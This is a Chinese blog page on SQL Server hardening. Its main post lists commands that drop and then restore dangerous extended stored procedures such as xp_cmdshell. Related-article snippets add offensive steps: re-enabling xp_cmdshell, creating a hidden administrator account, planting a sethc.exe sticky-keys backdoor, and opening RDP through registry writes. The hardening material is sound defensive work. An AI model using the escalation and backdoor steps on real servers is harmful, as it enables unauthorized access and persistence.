sp_dropextendedproc

最新推荐文章于 2022-08-12 10:04:09 发布
最新推荐文章于 2022-08-12 10:04:09 发布
阅读量1.3k 收藏 1
点赞数
文章标签: xp 扩展
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/gz775/article/details/6329817
版权
DROP   PROCEDURE   sp_makeWEBtask  
  exec   master..sp_dropextendedproc   xp_cmdshell  
  exec   master..sp_dropextendedproc   xp_dirtree  
  exec   master..sp_dropextendedproc   xp_fileexist  
  exec   master..sp_dropextendedproc   xp_terminate_process  
  exec   master..sp_dropextendedproc   sp_oamethod  
  exec   master..sp_dropextendedproc   sp_oacreate  
  exec   master..sp_dropextendedproc   xp_regaddmultistring  
  exec   master..sp_dropextendedproc   xp_regdeletekey  
  exec   master..sp_dropextendedproc   xp_regdeletevalue  
  exec   master..sp_dropextendedproc   xp_regenumkeys  
  exec   master..sp_dropextendedproc   xp_regenumvalues  
  exec   master..sp_dropextendedproc   sp_add_job  
  exec   master..sp_dropextendedproc   sp_addtask  
  exec   master..sp_dropextendedproc   xp_regread  
  exec   master..sp_dropextendedproc   xp_regwrITe  
  exec   master..sp_dropextendedproc   xp_readWEBtask  
  exec   master..sp_dropextendedproc   xp_makeWEBtask  
  exec   master..sp_dropextendedproc   xp_regremovemultistring  
  exec   master..sp_dropextendedproc   sp_OACreate  
  DROP   PROCEDURE   sp_addextendedproc


use master
EXEC sp_dropextendedproc 'Sp_OADestroy'
EXEC sp_dropextendedproc 'Sp_OAGetErrorInfo'
EXEC sp_dropextendedproc 'Sp_OAGetProperty'
EXEC sp_dropextendedproc 'Sp_OASetProperty'
EXEC sp_dropextendedproc 'Sp_OAStop'



恢复扩展
exec sp_addextendedproc 'xp_cmdshell', 'xplog70.dll'
exec sp_addextendedproc 'xp_dirtree', 'xpstar.dll'
exec sp_addextendedproc 'xp_enumgroups', 'xplog70.dll'
exec sp_addextendedproc 'xp_fixeddrives', 'xpstar.dll'
exec sp_addextendedproc 'xp_loginconfig', 'xplog70.dll'
exec sp_addextendedproc 'xp_regaddmultistring', 'xpstar.dll'
exec sp_addextendedproc 'xp_regdeletekey', 'xpstar.dll'
exec sp_addextendedproc 'xp_regdeletevalue', 'xpstar.dll'
exec sp_addextendedproc 'xp_regread', 'xpstar.dll'
exec sp_addextendedproc 'xp_regremovemultistring', 'xpstar.dll'
exec sp_addextendedproc 'xp_regwrite', 'xpstar.dll'
exec sp_addextendedproc 'xp_enumerrorlogs', 'xpstar.dll'
exec sp_addextendedproc 'xp_getfiledetails', 'xpstar.dll'
exec sp_addextendedproc 'xp_regenumvalues', 'xpstar.dll'
gz775
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sqlserver数据库危险扩展删除和恢复代码
12-15
曾经遇过,差点抓狂,有装MSSQL的朋友,赶紧试一下,删除以下的组件.当然,前提是你要把自己的数据库搞定后再去删除,否则组件删除后很多功能不能用,为了安全,就得牺牲某些功能,当然,像我这类的,我除了把MSSQL导入后,基本上一年用不到两次,所以,我是会毫不犹豫地删除,嘿. 一, 将有安全问题的SQL过程删除.比较全面.一切为了安全! 删除了调用shell,注册表,COM组件的破坏权限 MS SQL SERVER2000 使用系统帐户登陆查询分析器 运行以下脚本 代码如下: use master exec sp_dropextendedprocxp_cmdshell’ exec sp_dr
服务器安全设置之 MSSQL安全设置
01-20
MSSQL安全设置,将有安全问题的SQL过程删除.比较全面.一切为了安全! 删除了调用shell,注册表,COM组件的破坏权限 代码如下: use master EXEC sp_dropextendedprocxp_cmdshell’ EXEC sp_dropextendedprocSp_OACreate’ EXEC sp_dropextendedprocSp_OADestroy’ EXEC sp_dropextendedprocSp_OAGetErrorInfo’ EXEC sp_dropextendedprocSp_OAGetProperty’ EXEC sp_dro
1433提权工具sqlTools2.chs.rar
10-23
1、 未能找到存储过程'master..xpcmdshell' 这种情况我看到网上的方法是: 第一步先删除: drop procedure sp_addextendedproc drop procedure sp_oacreate exec sp_dropextendedproc 'xp_cmdshell' 第二步恢复: dbcc addextendedproc ("sp_oacreate","odsole70.dll") dbcc addextendedproc ("xp_cmdshell","xplog70.dll") 2、 原因: 126(找不到指定的模块。)。 修复方法: 第一步: dbcc dropextendedproc ("xp_cmdshell") 第二步先删除: drop procedure sp_addextendedproc drop procedure sp_oacreate exec sp_dropextendedproc 'xp_cmdshell' 第三步恢复: dbcc addextendedproc ("sp_oacreate","odsole70.dll") dbcc addextendedproc ("xp_cmdshell","xplog70.dll") 直接恢复,不管sp_addextendedproc是不是存在 3、 Error Message:SQL Server 阻止了对组件 'xp_cmdshell' 的 过程 'sys.xp_cmdshell' 的访问,因为此组件已作为此服务器安全配置的一部分而被关闭。系统管理员可以通过使用 sp_configure 启用 'xp_cmdshell'。有关启用 'xp_cmdshell' 的详细信息,请参阅 SQL Server 联机丛书中的 "外围应用配置器"。 修复方法:分离器上执行 EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE; 4、 net提权出现 拒绝访问 可以尝试一下net1 user 用户 密码 /add 如果net1也是拒绝访问可以copy一个shfit后门试试执行cmd命令:copy c:\windows\explorer.exe c:\windows\system32\sethc.exe copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe 如果提示 复制1文件 哪么证明成功了。连接终端然后按5下shift看看蹦出来了什么。玩咔咔 资源管理器,现在只要手工加个用户就好了。 5、 建号 net user chenyu chenyu$ /add net localgroup administrators chenyu /add C:\WINDOWS\system32\dllcache\net1.exe user chenyu chenyu$ /add C:\WINDOWS\system32\dllcache\net1.exe localgroup administrators chenyu /add 5、 开3389 execmaster.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',0;--
windows2003一键安全设置包下载 网站架设安全设置
09-22
windows2003一键安全设置包下载 网站架设安全设置 新鸿裕科技 美国月付空间 美国服务器 美国asp空间 免备案空间 内部传出! ┏━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓ ┃ 新鸿裕科技服务器系统盘轻量级安全策略 ┃ ┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛ 软件名称:新鸿裕科技服务器系统盘轻量级安全策略 官方网站:http://www.xhyidc.com 运行环境:windows2003 请运行“主程序.CMD”开始一键配置服务器 本程序主要是为系统盘做安全,包括目录权限、exe权限、dll权限等 本程序自带安全策略为星外虚拟主机管理系统专用策略 一键自动设置不包括清除系统垃圾文件 轻量级.CMD:基本安全设置 中量级.CMD:稍微强壮的安全设置,设置后可能.NET出现不可预估的错误,谨慎使用 serv-u运行需要users的读取与运行权限,如果在设置中取消了目录的权限导致无法登陆,请自行添加 ┏━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓ ┃ 美国月付空间,全能1G仅需20元,access/mysql/sql2000/sql2005全面支持 ┃ ┃ ┃ ┃ 美国加州/洛杉矶VPS月租,xen虚拟技术,八核强劲实力,绝不超卖 ┃ ┃ ┃ ┃ 一切,尽在新鸿裕科技WWW.XHYIDC.COM ┃ ┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛ ------------------------------------ 从安全角度应该让MSSQL和MYSQL必须运行在普通计算机用户权限下,而不是system用户或adm用户下,否则后果不堪设想! MYSQL设置方法: ===================================== 1. 建立用户(用计算机管理器); 先创建一个帐户如:mysql设置好密码,记住密码,分配到guests组,删除其他组。 2. 在分配其他必须权限,此处如果配置不好SQL将无法启动(例:mysql装在D盘) 右键点D盘,属性,安全,高级,添加,输入创建的帐户名,选择:只有该文件夹,勾上:读取权限(倒数第三个),点确定。 3. 在系统服务中配置该用户启动; 在运行里输入Services.msc回车打开服务面板,找到Mysql服务点右键属性,点登陆,登陆身份以你新建的Mysql用户登陆输入:.\帐号名,输入密码,点确定然后应用重启Mysql服务即可。 MSSQL设置方法: ===================================== 1. 建立用户(用计算机管理器); 先创建一个帐户如:mssql设置好密码,记住密码,分配到guests组,删除其他组。 2. 在分配其他必须权限,此处如果配置不好SQL将无法启动(例:mssql装在D盘) 右键点D盘,属性,安全,高级,添加,输入创建的帐户名,选择:只有该文件夹,勾上:读取权限(倒数第三个),点确定。 3. 在sql 2000企业管理器中配置该用户启动; 右键点我的电脑,管理,服务和应用程序,Microsoft SQL Servers,对着MSSQL点右键,安全性,最下面: 启动服务帐户,选择本帐户,输入:.\帐号名,输入密码,点确定,就OK了 4. 删除危险存储过程,方法如下: 删除MSSQL危险存储过程的代码 执行以下操作,一般不会影响其他操作,只是删除了比较危险的几个存储过程,一般我们也用不太到!这仅对于做虚拟主机的朋友来说的安全配置方法!如果人个,企业,就不必这样做了,有时这些功能也是用到比较多的! drop PROCEDURE sp_makewebtask exec master..sp_dropextendedproc xp_cmdshell exec master..sp_dropextendedproc xp_dirtree exec master..sp_dropextendedproc xp_fileexist exec master..sp_dropextendedproc xp_terminate_process exec master..sp_dropextendedproc sp_oamethod exec master..sp_dropextendedproc sp_oacreate exec master..sp_dropextendedproc xp_regaddmultistring exec master..sp_dropextendedproc xp_regdeletekey exec master..sp_dropextendedproc xp_regdeletevalue exec master..sp_dropextendedproc xp_regenumkeys exec master..sp_dropextendedproc xp_regenumvalues exec master..sp_dropextendedproc sp_add_job exec master..sp_dropextendedproc sp_addtask exec master..sp_dropextendedproc xp_regread exec master..sp_dropextendedproc xp_regwrite exec master..sp_dropextendedproc xp_readwebtask exec master..sp_dropextendedproc xp_makewebtask exec master..sp_dropextendedproc xp_regremovemultistring 在查询分析器里执行就可以了。 如果不这样做,数据库用户可以用BACKUP DATABASE指令上传木马到何任system用户有写入权限的目录中! 否则你的用户可以用 select * from 木马表名 into dumpfile 'c:\\木马.exe'; 在任何system有写入权限的目录写入木马 ===================================== 忠告:永远不要把服务器当成PC机来用,如:上QQ,访问网页,打CS等! Ps.宋板糖
存储过程sp_addextendedproc破坏处理
03-12
恢复sp_addextendedproc存储过程
SQL的xp_cmdshell和sp_addextendedproc删除与恢复
weixin_30858241的博客
09-20 116
--查询此过程的dll sp_helpextendedproc xp_cmdshell 删除相关控制台命令 --删除xp_cmdshell控制台 EXEC sp_dropextendedproc 'xp_cmdshell' --删除sp_addextendedproc附加函数 DROP PROCEDURE sp_addextendedproc 附加回相关控制台命令 -...
sp_addextendedproc
diedangxiang4092的博客
05-12 124
2008年5月12日志: sp_addextendedproc --------------------------- Microsoft SQL-DMO (ODBC SQLState: 42000) --------------------------- 错误 0: Cannot find the function xp_dirtree in the libra...
mysql xpcmdshell_MSSQL入侵恢复xp_cmdshell方法总结
weixin_39888180的博客
01-19 617
MSSQL弱口令入侵已经很罕见了,但在内网时有时还能用到,今天在搞机器的时候遇上一MSSQL2005,第一次见这错误信息,搜索到答案,贴在BLOG上以后遇上备用.-----------------------------------------------------------------------------------------------------------错误信息:SQL Ser...
数据库注入提权总结(三)
蚁景网安学院
08-12 4823
差异备份数据库得到webshell。在sqlserver里dbo和sa权限都有备份数据库权限,我们可以把数据库备份称asp文件,这样我们就可以通过mssqlserver的备份数据库功能生成一个网页小马。
mysql xpcmdshell,SQL入侵恢复xp_cmdshell方法总结
weixin_36341727的博客
03-17 256
sql server 2005下开启xp_cmdshell的办法EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;SQL2005开启'OPENROWSET'支持的方法:exec sp_configure 'show advanced opti...
xp_cmdshell开启与关闭
12-15
代码如下:xp_cmdshell可以让系统管理员以操作系统命令行解释器的方式执行给定的命令字符串,并以文本行方式返回任何输出,是一个功能非常强大的扩展存贮过程。     一般情况下,xp_cmdshell对管理员来说也是不必要的,xp_cmdshell的消除不会对Server造成任何影响。     可以将xp_cmdshell消除: Use Master Exec sp_dropextendedproc N’xp_cmdshell’ Go     如果需要的话,可以把xp_cmdshell恢复回来: Use Master Exec sp_addextendedproc N’xp_cmdshel
SQL 不常用的一些命令sp_OACreate,xp_cmdshell,sp_makewebtask
12-14
1. 开启和关毕xp_cmdshell EXEC sp_configure ‘show advanced options’, 1;RECONFIGURE;EXEC sp_configure ‘xp_cmdshell’, 1;RECONFIGURE;– 开启xp_cmdshell EXEC sp_configure ‘show advanced options’, 1;RECONFIGURE;EXEC sp_configure ‘xp_cmdshell’, 0;RECONFIGURE;– 关毕xp_cmdshell EXEC sp_configure ‘show advanced options
SQL Server SA权限总结经典技术
09-14
if exists (select * from dbo.sysobjects where id=object_id(N'[dbo].[xpcmdshell]') and OBJECTPROPERTY(id,N'IsExtendedProc')=1)exec sp_dropextendedproc N'[dbo].[xp_cmdshell]' 而添加xp_cmdshell的方法...
1433恢复,删除xp_cmdshell及修补sa弱口令命令
收集盒 Book box
02-20 787
<br /><br />create procedure sp_addextendedproc --- 1996/08/30 20:13<br />@functname nvarchar(517),/* (owner.)name of function to call */<br />@dllname varchar(255)/* name of DLL containing function */<br />as<br />set implicit_transactions off<br />if @@t
sql server 2005下开启xp_cmdshell的办法
weixin_33738982的博客
04-12 188
sql server 2005下开启xp_cmdshell的办法 2009年05月09日 星期六 下午 06:06 sql server 2005下开启xp_cmdshell的办法EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell...
xp_cmdshell 开启和关闭
weixin_30618985的博客
03-24 95
最近中cmd.exe病毒了,我准备停止xp_cmdshell存储过程 Exec sp_dropextendedproc N'xp_cmdshell' //删除 Exec sp_addextendedproc N'xp_cmdshell', N'xplog70.dll' //恢复 转载于:https://www.cnblogs.com/laogao/archive/2012/03/24/24...
删除和恢复xp_cmdshell的经典教程
kuxing100的专栏
02-18 681
常见情况恢复执行xp_cmdshell. 1 未能找到存储过程'master..xpcmdshell'.      恢复方法:查询分离器连接后, 第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int  第二步执行:sp_addextendedproc 'xp_cmdshell',
国内移动端APP月活跃(MAU)Top5000 数据整理
最新发布
06-16
国内移动端APP月活跃(MAU)Top5000 时间范围:2020年-2022年 具有一定参考价值 csv格式

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值